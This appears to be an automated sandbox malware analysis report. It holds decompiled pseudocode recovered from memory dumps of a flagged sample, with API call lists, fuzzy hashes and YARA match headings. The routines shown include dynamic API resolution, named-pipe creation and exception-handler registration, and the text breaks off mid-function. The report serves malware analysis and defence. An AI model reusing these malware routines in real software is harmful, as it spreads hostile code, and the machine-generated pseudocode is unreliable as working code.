                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(?), ref: 10012C84
                                                                                                                                                                                                • LoadLibraryA.KERNEL32(?), ref: 10012C9D
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CF9
                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,?), ref: 10012D18
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: AddressProc$HandleLibraryLoadModule
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 384173800-0
                                                                                                                                                                                                • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                                                                                                                                                                                • Instruction ID: bbc7bc05dd77d852e6aa3dff5e404edcf5ca9dda2a904c96c6524fe084a399b0
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                                                                                                                                                                                • Instruction Fuzzy Hash: 94A169B5A00219DFCB54CFA8D881AADBBF0FF08354F108569E915AB391D734EA91CF64
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 75%
                                                                                                                                                                                                			E10001C51(signed int __ecx, void* __eflags, void* __fp0) {
                                                                                                                                                                                                				char _v16;
                                                                                                                                                                                                				intOrPtr _v20;
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                				void* _t13;
                                                                                                                                                                                                				intOrPtr _t15;
                                                                                                                                                                                                				signed int _t16;
                                                                                                                                                                                                				intOrPtr _t17;
                                                                                                                                                                                                				signed int _t18;
                                                                                                                                                                                                				char _t20;
                                                                                                                                                                                                				intOrPtr _t22;
                                                                                                                                                                                                				void* _t23;
                                                                                                                                                                                                				void* _t24;
                                                                                                                                                                                                				intOrPtr _t29;
                                                                                                                                                                                                				intOrPtr _t35;
                                                                                                                                                                                                				intOrPtr _t41;
                                                                                                                                                                                                				intOrPtr _t43;
                                                                                                                                                                                                				intOrPtr _t48;
                                                                                                                                                                                                				void* _t51;
                                                                                                                                                                                                				signed int _t61;
                                                                                                                                                                                                				signed int _t64;
                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t71 = __fp0;
                                                                                                                                                                                                				_t61 = __ecx;
                                                                                                                                                                                                				_t41 =  *0x1001e6dc; // 0x0
                                                                                                                                                                                                				_t13 = E1000A501(_t41, 0);
                                                                                                                                                                                                				while(_t13 < 0) {
                                                                                                                                                                                                					E100097ED( &_v28);
                                                                                                                                                                                                					_t43 =  *0x1001e6e0; // 0x0
                                                                                                                                                                                                					_t15 =  *0x1001e6e4; // 0x0
                                                                                                                                                                                                					_t41 = _t43 + 0xe10;
                                                                                                                                                                                                					asm("adc eax, ebx");
                                                                                                                                                                                                					__eflags = _t15 - _v24;
                                                                                                                                                                                                					if(__eflags > 0) {
                                                                                                                                                                                                						L9:
                                                                                                                                                                                                						_t16 = 0xfffffffe;
                                                                                                                                                                                                						L13:
                                                                                                                                                                                                						return _t16;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					if(__eflags < 0) {
                                                                                                                                                                                                						L4:
                                                                                                                                                                                                						_t17 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
                                                                                                                                                                                                						__eflags = _t18;
                                                                                                                                                                                                						if(_t18 == 0) {
                                                                                                                                                                                                							break;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_t35 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                                                                                                                                                                                                						_t41 =  *0x1001e6dc; // 0x0
                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                						_t13 = E1000A501(_t41, 0);
                                                                                                                                                                                                						continue;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					__eflags = _t41 - _v28;
                                                                                                                                                                                                					if(_t41 >= _v28) {
                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					goto L4;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				_t20 =  *0x1001e6e8; // 0x0
                                                                                                                                                                                                				_v28 = _t20;
                                                                                                                                                                                                				_t22 = E1000A6EB(_t41, _t61,  &_v16);
                                                                                                                                                                                                				_v20 = _t22;
                                                                                                                                                                                                				if(_t22 != 0) {
                                                                                                                                                                                                					_t23 = GetCurrentProcess();
                                                                                                                                                                                                					_t24 = GetCurrentThread();
                                                                                                                                                                                                					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
                                                                                                                                                                                                					E100097ED(0x1001e6e0);
                                                                                                                                                                                                					_t64 = E10001A01( &_v28, E10001226, _t71);
                                                                                                                                                                                                					__eflags = _t64;
                                                                                                                                                                                                					if(_t64 >= 0) {
                                                                                                                                                                                                						_push(0);
                                                                                                                                                                                                						_push( *0x1001e760);
                                                                                                                                                                                                						_t51 = 0x27;
                                                                                                                                                                                                						E10009ED1(_t51);
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t64 = _t61 | 0xffffffff;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t29 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				 *((intOrPtr*)(_t29 + 0x30))( *0x1001e6d0);
                                                                                                                                                                                                				_t48 =  *0x1001e6dc; // 0x0
                                                                                                                                                                                                				 *0x1001e6d0 = 0;
                                                                                                                                                                                                				E1000A51D(_t48);
                                                                                                                                                                                                				E100085FB( &_v24, 0);
                                                                                                                                                                                                				_t16 = _t64;
                                                                                                                                                                                                				goto L13;
                                                                                                                                                                                                			}


























Memory Dump Source
• Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
• Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
• Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
• Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
• Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • Opcode ID: 0cb1578c0a39cae6aca948419ee61835f89ce0b6080761fa6d5caf452c66e295
                                                                                                                                                                                                • Instruction ID: 989caab118ce7ab378d4ccd16ca8a60e31d7662a7ac1e85353e2c3f970fe6dd1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0cb1578c0a39cae6aca948419ee61835f89ce0b6080761fa6d5caf452c66e295
                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A31C336604294AFF344DFA4DCC5C6E77A9FB583D4B80462AF941C71A5DA30ED048B52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 73%
                                                                                                                                                                                                			E10001B16(void* __eflags, void* __fp0) {
                                                                                                                                                                                                				char _v24;
                                                                                                                                                                                                				char _v28;
                                                                                                                                                                                                				void* _t12;
                                                                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                                                                				void* _t15;
                                                                                                                                                                                                				intOrPtr _t16;
                                                                                                                                                                                                				void* _t17;
                                                                                                                                                                                                				void* _t19;
                                                                                                                                                                                                				void* _t20;
                                                                                                                                                                                                				char _t24;
                                                                                                                                                                                                				intOrPtr _t26;
                                                                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                                                                				intOrPtr _t33;
                                                                                                                                                                                                				intOrPtr _t38;
                                                                                                                                                                                                				intOrPtr _t40;
                                                                                                                                                                                                				void* _t41;
                                                                                                                                                                                                				intOrPtr _t46;
                                                                                                                                                                                                				void* _t48;
                                                                                                                                                                                                				intOrPtr _t51;
                                                                                                                                                                                                				void* _t61;
                                                                                                                                                                                                				void* _t71;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t71 = __fp0;
                                                                                                                                                                                                				_t38 =  *0x1001e6f4; // 0x0
                                                                                                                                                                                                				_t12 = E1000A501(_t38, 0);
                                                                                                                                                                                                				while(_t12 < 0) {
                                                                                                                                                                                                					E100097ED( &_v28);
                                                                                                                                                                                                					_t40 =  *0x1001e700; // 0x0
                                                                                                                                                                                                					_t14 =  *0x1001e704; // 0x0
                                                                                                                                                                                                					_t41 = _t40 + 0x3840;
                                                                                                                                                                                                					asm("adc eax, ebx");
                                                                                                                                                                                                					__eflags = _t14 - _v24;
                                                                                                                                                                                                					if(__eflags > 0) {
                                                                                                                                                                                                						L13:
                                                                                                                                                                                                						_t15 = 0;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						if(__eflags < 0) {
                                                                                                                                                                                                							L4:
                                                                                                                                                                                                							_t16 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                							_t17 =  *((intOrPtr*)(_t16 + 0xc8))( *0x1001e6ec, 0);
                                                                                                                                                                                                							__eflags = _t17;
                                                                                                                                                                                                							if(_t17 == 0) {
                                                                                                                                                                                                								break;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								_t33 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                								 *((intOrPtr*)(_t33 + 0xb4))(0x1388);
                                                                                                                                                                                                								_t51 =  *0x1001e6f4; // 0x0
                                                                                                                                                                                                								__eflags = 0;
                                                                                                                                                                                                								_t12 = E1000A501(_t51, 0);
                                                                                                                                                                                                								continue;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							__eflags = _t41 - _v28;
                                                                                                                                                                                                							if(_t41 >= _v28) {
                                                                                                                                                                                                								goto L13;
                                                                                                                                                                                                							} else {
                                                                                                                                                                                                								goto L4;
                                                                                                                                                                                                							}
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					L12:
                                                                                                                                                                                                					return _t15;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				E100097ED(0x1001e700);
                                                                                                                                                                                                				_t19 = GetCurrentProcess();
                                                                                                                                                                                                				_t20 = GetCurrentThread();
                                                                                                                                                                                                				DuplicateHandle(GetCurrentProcess(), _t20, _t19, 0x1001e6ec, 0, 0, 2);
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				asm("stosd");
                                                                                                                                                                                                				_t24 =  *0x1001e6e8; // 0x0
                                                                                                                                                                                                				_v28 = _t24;
                                                                                                                                                                                                				_t61 = E10001A01( &_v28, E10001310, _t71);
                                                                                                                                                                                                				if(_t61 >= 0) {
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push( *0x1001e760);
                                                                                                                                                                                                					_t48 = 0x27;
                                                                                                                                                                                                					E10009ED1(_t48);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				if(_v24 != 0) {
                                                                                                                                                                                                					E10006871( &_v24);
                                                                                                                                                                                                				}
                                                                                                                                                                                                				_t26 =  *0x1001e684; // 0x4d2f878
                                                                                                                                                                                                				 *((intOrPtr*)(_t26 + 0x30))( *0x1001e6ec);
                                                                                                                                                                                                				_t28 =  *0x1001e758; // 0x0
                                                                                                                                                                                                				 *0x1001e6ec = 0;
                                                                                                                                                                                                				_t29 =  !=  ? 1 : _t28;
                                                                                                                                                                                                				_t46 =  *0x1001e6f4; // 0x0
                                                                                                                                                                                                				 *0x1001e758 =  !=  ? 1 : _t28;
                                                                                                                                                                                                				E1000A51D(_t46);
                                                                                                                                                                                                				_t15 = _t61;
                                                                                                                                                                                                				goto L12;
                                                                                                                                                                                                			}

























                                                                                                                                                                                                APIs
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(1001E6EC,00000000,00000000,00000002), ref: 10001BB5
                                                                                                                                                                                                • GetCurrentThread.KERNEL32 ref: 10001BB8
                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000000), ref: 10001BBF
                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 10001BC2
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Current$Process$DuplicateHandleThread
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3566409357-0
                                                                                                                                                                                                • Opcode ID: 62bd059770830b72633f7d4dc17b942c06e00c57d486a44e07410d3c772891c6
                                                                                                                                                                                                • Instruction ID: 409c5083fe20d1cac3a8bc114e50d19fd07b1f0f1d95d7a48f174e7666a0a82d
                                                                                                                                                                                                • Opcode Fuzzy Hash: 62bd059770830b72633f7d4dc17b942c06e00c57d486a44e07410d3c772891c6
                                                                                                                                                                                                • Instruction Fuzzy Hash: 3931AD356082A09FF308DF64CCD8D6E77A8FB683D1B418928F602872A5DB30EC44CB52
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 72%
                                                                                                                                                                                                			E10001A01(intOrPtr __ecx, intOrPtr __edx, void* __fp0) {
                                                                                                                                                                                                				char _v8;
                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                				CHAR* _v20;
                                                                                                                                                                                                				char _v36;
                                                                                                                                                                                                				signed short _t23;
                                                                                                                                                                                                				CHAR* _t24;
                                                                                                                                                                                                				CHAR* _t25;
                                                                                                                                                                                                				CHAR* _t33;
                                                                                                                                                                                                				char _t38;
                                                                                                                                                                                                				intOrPtr _t39;
                                                                                                                                                                                                				intOrPtr _t49;
                                                                                                                                                                                                				intOrPtr _t52;
                                                                                                                                                                                                				intOrPtr* _t55;
                                                                                                                                                                                                				void* _t57;
                                                                                                                                                                                                				signed int _t59;
                                                                                                                                                                                                				signed int _t60;
                                                                                                                                                                                                				signed int _t63;
                                                                                                                                                                                                				CHAR* _t65;
                                                                                                                                                                                                				void* _t75;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t75 = __fp0;
                                                                                                                                                                                                				_t39 = __ecx;
                                                                                                                                                                                                				_v16 = __edx;
                                                                                                                                                                                                				_t38 = 0;
                                                                                                                                                                                                				_t55 =  *0x1001e6f0; // 0x0
                                                                                                                                                                                                				_push(_t59);
                                                                                                                                                                                                				_t60 = _t59 | 0xffffffff;
                                                                                                                                                                                                				_v12 = __ecx;
                                                                                                                                                                                                				_t65 = _t60;
                                                                                                                                                                                                				if( *_t55 != 0) {
                                                                                                                                                                                                					L6:
                                                                                                                                                                                                					_t23 =  *0x1001e6fc; // 0x0
                                                                                                                                                                                                					_t73 = _t23;
                                                                                                                                                                                                					if(_t23 == 0) {
                                                                                                                                                                                                						goto L9;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t25 = E100015F3(_v16, _t55, _t73, _t23 & 0x0000ffff, _t39);
                                                                                                                                                                                                						_t65 = _t25;
                                                                                                                                                                                                						if(_t65 < 0) {
                                                                                                                                                                                                							goto L9;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                				} else {
                                                                                                                                                                                                					_t49 =  *0x1001e778; // 0x0
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_push(0);
                                                                                                                                                                                                					_t57 = 0x2d;
                                                                                                                                                                                                					_v8 = E10009F60(_t49, _t57);
                                                                                                                                                                                                					_t33 = E10009E47(0x2e);
                                                                                                                                                                                                					_t58 = _v8;
                                                                                                                                                                                                					_v20 = _t33;
                                                                                                                                                                                                					if(_v8 != 0 && _t33 != _t60) {
                                                                                                                                                                                                						_t52 =  *0x1001e6f0; // 0x0
                                                                                                                                                                                                						E100096AB(_t52, _t58, 0x100);
                                                                                                                                                                                                						 *0x1001e6fc = _v20;
                                                                                                                                                                                                					}
                                                                                                                                                                                                					E100085FB( &_v8, _t60);
                                                                                                                                                                                                					_t55 =  *0x1001e6f0; // 0x0
                                                                                                                                                                                                					if( *_t55 == _t38) {
                                                                                                                                                                                                						L9:
                                                                                                                                                                                                						_v8 = _t38;
                                                                                                                                                                                                						_t24 = E1000175E( &_v8, _t75);
                                                                                                                                                                                                						_v20 = _t24;
                                                                                                                                                                                                						__eflags = _t24;
                                                                                                                                                                                                						if(_t24 != 0) {
                                                                                                                                                                                                							__eflags = _v8 - _t38;
                                                                                                                                                                                                							if(_v8 > _t38) {
                                                                                                                                                                                                								_t14 =  &(_t24[4]); // 0x4
                                                                                                                                                                                                								_t63 = _t14;
                                                                                                                                                                                                								while(1) {
                                                                                                                                                                                                									__eflags =  *_t63;
                                                                                                                                                                                                									if(__eflags != 0) {
                                                                                                                                                                                                										__imp__#12(0x10);
                                                                                                                                                                                                										lstrcpynA( &_v36, _t24,  *_t63);
                                                                                                                                                                                                										_t24 = E100015F3(_v16,  &_v36, __eflags,  *(_t63 + 4) & 0x0000ffff, _v12);
                                                                                                                                                                                                										_t65 = _t24;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									__eflags = _t65;
                                                                                                                                                                                                									if(_t65 >= 0) {
                                                                                                                                                                                                										break;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									_t38 = _t38 + 1;
                                                                                                                                                                                                									_t63 = _t63 + 0x20;
                                                                                                                                                                                                									__eflags = _t38 - _v8;
                                                                                                                                                                                                									if(_t38 < _v8) {
                                                                                                                                                                                                										continue;
                                                                                                                                                                                                									}
                                                                                                                                                                                                									break;
                                                                                                                                                                                                								}
                                                                                                                                                                                                								_t60 = _t63 | 0xffffffff;
                                                                                                                                                                                                								__eflags = _t60;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							E100085FB( &_v20, _v8);
                                                                                                                                                                                                						}
                                                                                                                                                                                                						__eflags = _t65;
                                                                                                                                                                                                						_t61 =  >=  ? _t65 : _t60;
                                                                                                                                                                                                						_t25 =  >=  ? _t65 : _t60;
                                                                                                                                                                                                					} else {
                                                                                                                                                                                                						_t39 = _v12;
                                                                                                                                                                                                						goto L6;
                                                                                                                                                                                                					}
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t25;
                                                                                                                                                                                                			}























                                                                                                                                                                                                0x10001af7
                                                                                                                                                                                                0x10001af9
                                                                                                                                                                                                0x10001af9
                                                                                                                                                                                                0x10001af9
                                                                                                                                                                                                0x10001b03
                                                                                                                                                                                                0x10001b09
                                                                                                                                                                                                0x10001b0a
                                                                                                                                                                                                0x10001b0c
                                                                                                                                                                                                0x10001b0f
                                                                                                                                                                                                0x10001a7c
                                                                                                                                                                                                0x10001a7c
                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x10001a7c
                                                                                                                                                                                                0x10001a7a
                                                                                                                                                                                                0x10001b15

                                                                                                                                                                                                APIs
                                                                                                                                                                                                • inet_ntoa.WS2_32(00000004), ref: 10001AC4
                                                                                                                                                                                                • lstrcpynA.KERNEL32(?,00000000), ref: 10001ACF
                                                                                                                                                                                                  • Part of subcall function 100096AB: memset.MSVCRT ref: 100096D4
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000009.00000002.388997156.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                                                • Associated: 00000009.00000002.388992737.0000000010000000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389011900.0000000010018000.00000002.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389018187.000000001001D000.00000004.00020000.sdmp
                                                                                                                                                                                                • Associated: 00000009.00000002.389024991.000000001001F000.00000002.00020000.sdmp
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: inet_ntoalstrcpynmemset
                                                                                                                                                                                                • String ID: @}3u
                                                                                                                                                                                                • API String ID: 129148211-847092897
                                                                                                                                                                                                • Opcode ID: 2ff538a7969370964a1824f7d2e75486253296b6791e3705cbd6b1be8b8011ed
                                                                                                                                                                                                • Instruction ID: 38053383c4236d1d8a5a71da8a126f05441a8ed644907563ab899a3ef3cb99fb
                                                                                                                                                                                                • Opcode Fuzzy Hash: 2ff538a7969370964a1824f7d2e75486253296b6791e3705cbd6b1be8b8011ed
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9331E736E05266EBFB01CBA4DC809DD77B9FF443A0F10416AE510A7288DB31EE41CB91
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                			E00AF31B5(void* __edx, void* __eflags) {
                                                                                                                                                                                                				CHAR* _v8;
                                                                                                                                                                                                				intOrPtr _v12;
                                                                                                                                                                                                				intOrPtr _v16;
                                                                                                                                                                                                				void* _v20;
                                                                                                                                                                                                				signed int _t10;
                                                                                                                                                                                                				intOrPtr _t11;
                                                                                                                                                                                                				intOrPtr _t12;
                                                                                                                                                                                                				void* _t16;
                                                                                                                                                                                                				intOrPtr _t18;
                                                                                                                                                                                                				intOrPtr _t22;
                                                                                                                                                                                                				intOrPtr _t28;
                                                                                                                                                                                                				void* _t38;
                                                                                                                                                                                                				CHAR* _t40;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t38 = __edx;
                                                                                                                                                                                                				_t28 =  *0xb0e688; // 0xb20000
                                                                                                                                                                                                				_t10 = E00AFC2D4( *((intOrPtr*)(_t28 + 0xac)), __eflags);
                                                                                                                                                                                                				_t40 = _t10;
                                                                                                                                                                                                				_v8 = _t40;
                                                                                                                                                                                                				if(_t40 != 0) {
                                                                                                                                                                                                					_t11 = E00AF85E5(0x80000); // executed
                                                                                                                                                                                                					 *0xb0e724 = _t11;
                                                                                                                                                                                                					__eflags = _t11;
                                                                                                                                                                                                					if(_t11 != 0) {
                                                                                                                                                                                                						_t12 = E00AFBD52(); // executed
                                                                                                                                                                                                						_v16 = _t12;
                                                                                                                                                                                                						__eflags = _t12;
                                                                                                                                                                                                						if(_t12 != 0) {
                                                                                                                                                                                                							_push(0xc);
                                                                                                                                                                                                							_pop(0);
                                                                                                                                                                                                							_v12 = 1;
                                                                                                                                                                                                						}
                                                                                                                                                                                                						_v20 = 0;
                                                                                                                                                                                                						__eflags = 0;
                                                                                                                                                                                                						asm("sbb eax, eax");
                                                                                                                                                                                                						_t16 = CreateNamedPipeA(_t40, 0x80003, 6, 0xff, 0x80000, 0x80000, 0, 0 &  &_v20);
                                                                                                                                                                                                						 *0xb0e674 = _t16;
                                                                                                                                                                                                						__eflags = _t16 - 0xffffffff;
                                                                                                                                                                                                						if(_t16 != 0xffffffff) {
                                                                                                                                                                                                							E00AFBCBC( &_v20, _t38); // executed
                                                                                                                                                                                                							_t18 = E00AF98CF(E00AF3294, 0, __eflags, 0, 0); // executed
                                                                                                                                                                                                							__eflags = _t18;
                                                                                                                                                                                                							if(_t18 != 0) {
                                                                                                                                                                                                								goto L12;
                                                                                                                                                                                                							}
                                                                                                                                                                                                							_t22 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                							 *((intOrPtr*)(_t22 + 0x30))( *0xb0e674);
                                                                                                                                                                                                							_push(0xfffffffd);
                                                                                                                                                                                                							goto L11;
                                                                                                                                                                                                						} else {
                                                                                                                                                                                                							 *0xb0e674 = 0;
                                                                                                                                                                                                							_push(0xfffffffe);
                                                                                                                                                                                                							L11:
                                                                                                                                                                                                							_pop(0);
                                                                                                                                                                                                							L12:
                                                                                                                                                                                                							E00AF85FB( &_v8, 0xffffffff);
                                                                                                                                                                                                							return 0;
                                                                                                                                                                                                						}
                                                                                                                                                                                                					}
                                                                                                                                                                                                					_push(0xfffffff5);
                                                                                                                                                                                                					goto L11;
                                                                                                                                                                                                				}
                                                                                                                                                                                                				return _t10 | 0xffffffff;
                                                                                                                                                                                                			}
















                                                                                                                                                                                                0x00000000
                                                                                                                                                                                                0x00af31f7
                                                                                                                                                                                                0x00000000

                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID:
                                                                                                                                                                                                • Opcode ID: af69e7f080b2878b0583c4807da561253e2bec5baf63eb4794f599b0c6522cc8
                                                                                                                                                                                                • Instruction ID: 360533c5c4852170793bf61523d48382e5da9e3ce1f6ccc893345c99e3dad344
                                                                                                                                                                                                • Opcode Fuzzy Hash: af69e7f080b2878b0583c4807da561253e2bec5baf63eb4794f599b0c6522cc8
                                                                                                                                                                                                • Instruction Fuzzy Hash: 08219572605219AADF10ABF9AD45FBA37A8EB75770F20072AF235D71D1EE318A008751
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 100%
                                                                                                                                                                                                			E00AF5A54(void* __eflags) {
                                                                                                                                                                                                				intOrPtr _t2;
                                                                                                                                                                                                				void* _t6;
                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                
                                                                                                                                                                                                				_t2 =  *0xb0e684; // 0x4d3f6c8
                                                                                                                                                                                                				 *((intOrPtr*)(_t2 + 0x108))(1, E00AF59F9);
                                                                                                                                                                                                				E00AF5624(_t6, _t7); // executed
                                                                                                                                                                                                				return 0;
                                                                                                                                                                                                			}







                                                                                                                                                                                                APIs
                                                                                                                                                                                                • RtlAddVectoredExceptionHandler.NTDLL(00000001,00AF59F9,00AF5CC9), ref: 00AF5A60
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000011.00000002.592808629.0000000000AF0000.00000040.00020000.sdmp, Offset: 00AF0000, based on PE: true
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: ExceptionHandlerVectored
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3310709589-0
                                                                                                                                                                                                • Opcode ID: 11e48847a585f96b96e7af7e86146740c7d221f52374126f574574594a982e79
                                                                                                                                                                                                • Instruction ID: 16737cfd1f58333593e5104f9b285ddc6a4ee935f4f003c8bd053c5b58107ed8
                                                                                                                                                                                                • Opcode Fuzzy Hash: 11e48847a585f96b96e7af7e86146740c7d221f52374126f574574594a982e79
                                                                                                                                                                                                • Instruction Fuzzy Hash: 04B09231640905AACA8067F09E4AAA432D06B30702F0509A0B364CA0A7CED184808641
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                C-Code - Quality: 79%
                                                                                                                                                                                                			E00AF49FE(void* __ecx, void* __edx, void* __fp0, intOrPtr* _a4, WCHAR* _a8, signed int _a12) {
                                                                                                                                                                                                				char _v516;
                                                                                                                                                                                                				void _v1044;
                                                                                                                                                                                                				char _v1076;
                                                                                                                                                                                                				signed int _v1080;
                                                                                                                                                                                                				signed int _v1096;
                                                                                                                                                                                                				WCHAR* _v1100;
                                                                                                                                                                                                				intOrPtr _v1104;
                                                                                                                                                                                                				signed int _v1108;
                                                                                                                                                                                                				intOrPtr _v1112;
                                                                                                                                                                                                				intOrPtr _v1116;
                                                                                                                                                                                                				char _v1144;
                                                                                                                                                                                                				char _v1148;
                                                                                                                                                                                                				void* __esi;
                                                                                                                                                                                                				intOrPtr _t66;
                                                                                                                                                                                                				intOrPtr _t73;
                                                                                                                                                                                                				signed int _t75;
                                                                                                                                                                                                				intOrPtr _t76;
                                                                                                                                                                                                				signed int _t80;
                                                                                                                                                                                                				signed int _t81;
                                                                                                                                                                                                				WCHAR* _t87;
                                                                                                                                                                                                				void* _t89;
                                                                                                                                                                                                				signed int _t90;
                                                                                                                                                                                                				signed int _t91;
                                                                                                                                                                                                				signed int _t93;
                                                                                                                                                                                                				signed int _t94;
                                                                                                                                                                                                				WCHAR* _t96;
                                                                                                                                                                                                				intOrPtr _t106;
                                                                                                                                                                                                				intOrPtr _t107;
                                                                                                                                                                                                				void* _t108;
                                                                                                                                                                                                				intOrPtr _t109;
                                                                                                                                                                                                				signed char _t116;
                                                                                                                                                                                                				WCHAR* _t118;
                                                                                                                                                                                                				void* _t122;
                                                                                                                                                                                                				signed int _t123;
                                                                                                                                                                                                				intOrPtr _t125;
                                                                                                                                                                                                				void* _t128;
                                                                                                                                                                                                				void* _t129;
